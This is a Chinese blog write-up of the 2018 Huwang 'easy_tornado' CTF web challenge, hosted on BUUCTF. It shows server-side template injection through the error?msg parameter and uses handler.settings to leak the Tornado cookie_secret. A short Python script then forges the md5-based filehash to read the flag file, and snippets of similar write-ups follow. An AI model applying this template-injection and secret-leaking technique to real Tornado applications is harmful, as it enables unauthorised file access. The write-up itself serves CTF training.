2018护网杯easy_tornado(BUUCTF提供复现)

最新推荐文章于 2024-04-07 18:42:38 发布
最新推荐文章于 2024-04-07 18:42:38 发布
阅读量1k 收藏
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/104124887
版权

在这里插入图片描述进入页面首先看一下flag.txt
file?filename=/flag.txt&filehash=9f1a5c8c40be3aafbc5e719d151b1d36
换成fllllllllllllg试一试
出现error
在这里插入图片描述然后一脸懵逼,查阅资料发现这是一个SSTI注入,原理跟SQL注入一样,但是上图把在这里插入图片描述
又查阅资料发现尝试进行验证:
传递error?msg={{2}},页面出现2
传递error?msg={{2*3}},页面出现ORZ(但并不是cookie)
尝试除和减操作符也是)返回ORZ,说明是操作符背过滤了。

那么tornado中的cookie通过模板注入要怎么拿到呢?
用的就是handler.settings对象

handler 指向RequestHandler
而RequestHandler.settings又指向self.application.settings
所有handler.settings就指向RequestHandler.application.settings了!
原文链接:https://blog.csdn.net/zz_Caleb/article/details/101473013/

进入拿到cookie_secret了
{‘autoreload’: True, ‘compiled_template_cache’: False, ‘cookie_secret’: ‘73e3eafa-153d-4145-a916-c1e8b3026948’}
然后算/hints.txt
md5(cookie_secret+md5(filename))
下面贴上脚本

import hashlib


def md5value(s):
    md5 = hashlib.md5()
    md5.update(s.encode())
    return md5.hexdigest()


def mdfive2():
    filename = '/fllllllllllllag'
    cookie = r"73e3eafa-153d-4145-a916-c1e8b3026948"
    print(md5value(cookie + md5value(filename)))

mdfive2()

之后算出来,然后访问068f75b7-4e20-4f64-9997-99dc0da0f8d3.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=0256f1866c4fd79c4b1f3a90d0c731a1
拿到flagflag{83b208fc-fcf0-41c3-9194-3f745683744a}

jing!
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuojweb刷题wp详解及知识整理—-【护网easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
2018护网逆向题目
10-16
2018护网的3道逆向题目.
BUUCTF[护网 2018]easy_tornado1-write up
m0_62851980的博客
04-23 878
知识点: SSTI(模板注入),render函数,Tornado框架(知识点在最后) 打开靶机,看到三个链接: 分别点进去: 注意每个链接的url: /file?filename=/xxx&filehash=32位MD5 根据flag.txt和hint.txt提示url的形式为:文件名+32位MD5 再看hint.txt的提示:md5(cookie_secret+md5(filename))。明显我们要先找到cookie_secret进行MD5加密,再和进行MD5加密后输入的文
BUUCTF WEB [护网 2018]easy_tornado
Y1da的博客
04-17 639
BUUCTF WEB [护网 2018]easy_tornado 进入环境,发现三个文件 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 根据题目提示可知,题目环境使用python tornado模板渲染搭建,flag文件名为fllllllllllllag。观察URL可知,访问文件需要提交文件名filename和利用cooki
easytornado-攻防世界
最新发布
szhangliwenya的博客
04-07 519
handler指向处理当前这个页面的RequestHandler对象, RequestHandler.setting指向self.application.settings,因此构造payload。tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入。查询到可以使用{{handler.settings}}获取服务器的配置文件信息。代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。
[护网 2018]easy_tornado 1
shinygod的博客
01-29 2936
考点: 1、SSTI(务器端模板注入) 2、模板中的Handler 做之前先全点一遍看看里面有啥 flag.txt: 看到一个fllllllllllllag,正好有个filename参数,带进去看看: 好吧,我想多了。。 再看一下第二个文件:welcome.txt 它提示了一个单词:render,题目中也告诉了我们是tornado,所以想到SSTI,但想到了是一回事,会不会做又是另一回事,=_=,咱先不着急,先把第三个文件看完:hints.txt 这玩意应该就是filehash的参数了,filen
[护网 2018]easy_tornado 解析
qq_73722777的博客
10-09 292
tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。打开网页有三个链接,依次点开之后获得一个fllllllllllllag一个render和一个MD5加密格式。
[护网 2018]easy_tornado
m0sway的博客
03-30 192
BUU CTF [护网 2018]easy_tornado WriteUp
2020全国工业互联网安全技术技能大赛-护网-chinaiisc2020.zip
10-24
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
2020全国工业互联网安全技术技能大赛-护网原题及附件-chinaiisc2020
01-11
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
模板注入(tornado_render)之[护网 2018]easy_tornado1
qq_58970968的博客
04-10 315
根据提供的三个文件可以知道,flag在fllllllllag目录下;根据题目tornado 还有提示render知道,这大概念是考模板注入{{}} ;然后观看URL发现,可以猜测: 这道题需要构造/file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename)) 当然在此之前用{{}}来注入会发现每次都会跳到error?msg 在这里构造{{1}}就会返回一个值;大可判定就是模板注入;关于rende...
护网-easytornado
unexpectedthing的博客
10-29 100
文章目录前言解题思路 前言 这个题就是不太算一个SSTI的题,就是对tornado框架的理解 解题思路 进网站后看到三个文件,分别打开 /flag.txt,flag in /fllllllllllllag /welcome.txt,render /hints.txt,md5(cookie_secret+md5(filname)) 这个时候我们需要看到url有两个参数,filename和filehash。 网上搜tornado,发现是python的web框架,尝试用SSTI注入的方法 filename={{
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 417
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
护网 2018]easy_tornado1
weixin_60624663的博客
11-19 236
rrui
buuctf-web-[护网 2018]easy_tornado-wp
居上
07-12 225
[护网 2018]easy_tornado 知识点 Python模板注入(ssti) 过程 根据题目名称tornado,搜索一番,发现tornado是一个Python的模板 welcome.txt提示render,经过查询render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。 主页: 三个文件中分别提示的内容为 flag in /fllllllllllllag render md5(cookie_secret+md5(filename)) 然后抓个

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值